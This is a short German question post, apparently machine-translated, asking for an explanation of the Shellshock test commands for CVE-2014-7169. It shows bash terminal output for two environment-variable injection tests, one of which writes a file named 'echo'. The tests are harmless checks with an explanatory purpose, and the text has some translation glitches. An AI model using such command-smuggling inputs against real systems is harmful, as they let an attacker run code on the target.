Wie funktioniert CVE-2014-7169? Aufschlüsselung des Testcodes
Mit einer Bash-Version, die für Shellshock gepatcht wurde
$ bash --version
GNU bash, version 3.2.52(1)-release (x86_64-apple-darwin12)
Copyright (C) 2007 Free Software Foundation, Inc.
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test
Ein weiterersimilar Exploit funktioniert immer noch und wurde @ zugewies CVE-2014-7169
$ env X='() { (a)=>\' bash -c "echo date"; cat echo
bash: X: line 1: syntax error near unexpected token `='
bash: X: line 1: `'
bash: error importing function definition for `X'
Thu Sep 25 12:47:22 EDT 2014
$ ls echo
echo
Ich suche auch nach einer Aufschlüsselung.